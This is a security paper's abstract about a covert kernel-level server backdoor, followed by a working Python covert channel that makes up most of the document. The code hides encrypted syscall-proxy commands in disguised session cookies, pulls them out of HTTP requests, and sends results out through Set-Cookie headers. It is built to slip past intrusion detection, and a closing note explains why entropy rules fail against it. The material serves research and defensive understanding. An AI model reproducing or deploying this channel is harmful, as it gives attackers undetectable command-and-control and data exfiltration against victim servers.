Covert remote syscall communication at kernel level: A SPOOKY backdoor

Malware today often uses sophisticated methods to avoid detection on the victim machine itself. Hiding the actual communication between an attacker and the malware, however, is often neglected by malware authors. As a consequence, intermediate hosts that inspect the victim's incoming and outgoing traffic may still be able to detect the infection. In this paper, we describe a proof-of-concept server backdoor that hides the infiltration and exfiltration of data inside the benign incoming and outgoing traffic of the victim server. Using a low-traffic system call proxy, the backdoor allows the remote execution of arbitrary programs on the victim server without being detected by network intrusion detection systems. We implement the proof-of-concept backdoor on top of the HTTP Cookie header and evaluate it against the Snort network intrusion detection system. In addition, we show how other widespread services such as SSH, IPsec, and OpenVPN can be used to conceal the attacker's communication, and we briefly discuss countermeasures.
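The Cookie-header channel sketched in the abstract, as an added example that is not the paper's code: a command for a system call proxy is hidden in a cookie value that looks like an ordinary session identifier, the receiver picks it out of a raw HTTP request, and the reply travels back inside a Set-Cookie header of an otherwise benign response. The cookie name "sid", the 8-byte nonce, the HMAC-SHA256 keystream, the 4-byte recognition tag and the sample request and response are all assumptions of this example, not details from the paper.

```python
"""Toy covert channel over the HTTP Cookie / Set-Cookie headers.

Added example, not code from the paper. Assumed here: the cookie name "sid",
an 8-byte nonce, an HMAC-SHA256 keystream and a 4-byte HMAC tag that lets the
receiver tell covert cookies apart from benign ones.
"""
import base64
import hashlib
import hmac
import json
import math
import os
from collections import Counter
from typing import Optional

SHARED_KEY = b"example-shared-secret"  # assumed pre-shared between attacker and backdoor
COOKIE_NAME = "sid"                    # assumed: looks like a normal session cookie
NONCE_LEN = 8
TAG_LEN = 4                            # ~2^-32 chance a benign cookie is misread as covert


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode; stdlib only, so the example runs anywhere."""
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:length]


def _xor(data: bytes, key: bytes, nonce: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))


def encode_covert_cookie(payload: bytes, key: bytes = SHARED_KEY,
                         nonce: Optional[bytes] = None) -> str:
    """Hide `payload` in a `name=value` pair that looks like a random session id."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    ct = _xor(payload, key, nonce)
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    value = base64.urlsafe_b64encode(nonce + ct + tag).decode().rstrip("=")
    return f"{COOKIE_NAME}={value}"


def decode_covert_cookie(header_value: str, key: bytes = SHARED_KEY) -> Optional[bytes]:
    """Return the payload hidden in a Cookie or Set-Cookie value, else None.
    Other cookie names, undecodable values and bad tags are all ignored, so
    ordinary cookies pass through untouched."""
    for part in header_value.split(";"):
        name, _, value = part.strip().partition("=")
        if name != COOKIE_NAME or not value:
            continue
        try:
            blob = base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
        except ValueError:
            continue
        if len(blob) < NONCE_LEN + TAG_LEN:
            continue
        nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
        expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
        if hmac.compare_digest(tag, expected):
            return _xor(ct, key, nonce)
    return None


def extract_hidden(raw_message: bytes, header_name: str,
                   key: bytes = SHARED_KEY) -> Optional[dict]:
    """Scan the headers of a raw HTTP request ("Cookie") or response ("Set-Cookie")
    and return the hidden JSON message if one is present."""
    head = raw_message.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request/status line
        hname, _, hvalue = line.decode("latin-1").partition(":")
        if hname.strip().lower() == header_name.lower():
            payload = decode_covert_cookie(hvalue.strip(), key)
            if payload is not None:
                return json.loads(payload)
    return None


def hide_in_response(raw_response: bytes, message: dict, key: bytes = SHARED_KEY) -> bytes:
    """Exfiltrate `message` by adding one Set-Cookie header to a benign response."""
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    cookie = encode_covert_cookie(json.dumps(message).encode(), key)
    return head + b"\r\n" + f"Set-Cookie: {cookie}; Path=/; HttpOnly".encode() + sep + body


def shannon_entropy(s: str) -> float:
    """Bits per character; a random session id and a covert value look alike."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


if __name__ == "__main__":
    # Constructed request: a syscall-proxy command hidden next to a benign cookie.
    command = {"syscall": "getpid", "args": []}
    request = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nCookie: lang=en; "
               + encode_covert_cookie(json.dumps(command).encode()).encode() + b"\r\n\r\n")
    print("backdoor sees :", extract_hidden(request, "Cookie"))
    # Constructed benign response; the result rides back in a Set-Cookie header.
    response = hide_in_response(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok", {"ret": 4242})
    print("attacker sees :", extract_hidden(response, "Set-Cookie"))
    covert = encode_covert_cookie(b"x" * 16).split("=", 1)[1]
    benign = base64.urlsafe_b64encode(os.urandom(28)).decode().rstrip("=")
    print("entropy covert:", round(shannon_entropy(covert), 2))
    print("entropy benign:", round(shannon_entropy(benign), 2))
```

The entropy comparison at the end is the caveat a defender should take from the abstract: once the hidden bytes are encrypted and base64-encoded, a covert cookie has the same length and per-character entropy as a genuine random session token, so a signature or entropy rule on cookie values alone will not separate the two. The recognition tag, not a fixed marker string, is what lets the receiver find its own cookies among benign ones without giving a network sensor a constant to match on.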